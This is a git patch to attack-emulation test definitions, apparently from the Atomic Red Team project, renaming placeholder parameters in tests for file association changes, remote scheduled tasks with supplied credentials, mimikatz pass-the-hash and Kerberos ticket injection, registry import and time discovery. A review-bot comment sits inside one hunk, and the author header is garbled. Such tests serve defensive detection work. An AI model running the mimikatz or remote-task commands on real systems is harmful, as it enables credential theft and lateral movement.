From b2dda75932c03f993351938bfdfaaa19e856e24b Mon Sep 17 00:00:00 2001
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag>
Date: Fri, 31 Aug 2018 07:59:05 -0400
Subject: [PATCH] Technique fixes
Fixed techniques per Issue #317
---
 atomics/T1042/T1042.yaml | 2 +-
 atomics/T1053/T1053.yaml | 3 ++-
 atomics/T1075/T1075.yaml | 6 +++---
 atomics/T1103/T1103.yaml | 2 +-
 atomics/T1124/T1124.yaml | 2 +-
 5 files changed, 8 insertions(+), 7 deletions(-)
diff --git a/atomics/T1042/T1042.yaml b/atomics/T1042/T1042.yaml
index 44a01f0f..540335f7 100644
--- a/atomics/T1042/T1042.yaml
+++ b/atomics/T1042/T1042.yaml
@@ -21,4 +21,4 @@ atomic_tests:
 executor:
 name: command_prompt
 command: |
- cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"
+ cmd.exe assoc #{extension_to_change}="#{target_exenstion_handler}"
diff --git a/atomics/T1053/T1053.yaml b/atomics/T1053/T1053.yaml
index 9484ef5a..e81a4c38 100644
--- a/atomics/T1053/T1053.yaml
+++ b/atomics/T1053/T1053.yaml
@@ -35,6 +35,7 @@ atomic_tests:
 name: command_prompt
 command: |
 SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
+
 - name: Scheduled task Remote
 description: |
 Create a task on a remote system
@@ -65,4 +66,4 @@ atomic_tests:
 executor:
 name: command_prompt
 command: |
- SCHTASKS /Create /S #{target} /RU #{UserName} /RP #{Password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
+ SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
diff --git a/atomics/T1075/T1075.yaml b/atomics/T1075/T1075.yaml
index 8072ce72..0bdc358d 100644
--- a/atomics/T1075/T1075.yaml
+++ b/atomics/T1075/T1075.yaml
@@ -12,7 +12,7 @@ atomic_tests:
 - windows
 input_arguments:
- user:
+ user_name:
 description: username
 type: string
 default: Administrator
 
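Review bot: `target_exenstion_handler` on the added T1042 command line looks like a misspelling of `target_extension_handler`, and because the `input_arguments` block for this test is outside the hunk and the diffstat shows only this one line changed in T1042.yaml, the declared key and the `#{...}` reference must be checked for an exact match or the literal placeholder is passed to `assoc` unsubstituted. The same check applies to the renamed placeholders in the other hunks of this commit (`user_name`/`password` in the T1053 remote task, `user_name`/`domain` in the T1075 Kerberos test, `registry_file` in T1103, `computer_name` in T1124), whose declarations are likewise not touched by the commit; only the T1075 pass-the-hash test has its `user:` key renamed to `user_name:` alongside the command. If a declared key still carries an old name, a one-line fix is to rename it to match, e.g. `user_name:` in place of `UserName:`; if the keys were already renamed earlier, these hunks are the matching fix and nothing further is needed. An unresolved `#{…}` literal shows up verbatim in the process command line recorded by endpoint telemetry when the test runs, which is a quick way to confirm each rendered test after the merge.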
@@ -28,7 +28,7 @@ atomic_tests:
 executor:
 name: command_prompt
 command: |
- mimikatz # sekurlsa::pth /user:#{user} /domain:#{domain} /ntlm:#{ntlm}
+ mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
 
 - name: Mimikatz Kerberos Ticket Attack
 description: |
@@ -40,4 +40,4 @@ atomic_tests:
 executor:
 name: command_prompt
 command: |
- mimikatz # kerberos::ptt #{username}@#{Domain}
+ mimikatz # kerberos::ptt #{user_name}@#{domain}
diff --git a/atomics/T1103/T1103.yaml b/atomics/T1103/T1103.yaml
index d1c04cf0..72f636e7 100644
--- a/atomics/T1103/T1103.yaml
+++ b/atomics/T1103/T1103.yaml
@@ -18,4 +18,4 @@ atomic_tests:
 executor:
 name: command_prompt
 command: |
- reg.exe import #{file_name}
+ reg.exe import #{registry_file}
diff --git a/atomics/T1124/T1124.yaml b/atomics/T1124/T1124.yaml
index 4a68cbe3..aa35cae0 100644
--- a/atomics/T1124/T1124.yaml
+++ b/atomics/T1124/T1124.yaml
@@ -19,7 +19,7 @@ atomic_tests:
 executor:
 name: command_prompt
 command: |
- net time \\#{computername}
+ net time \\#{computer_name}
 w32tm /tz
 
 - name: System Time Discovery - PowerShell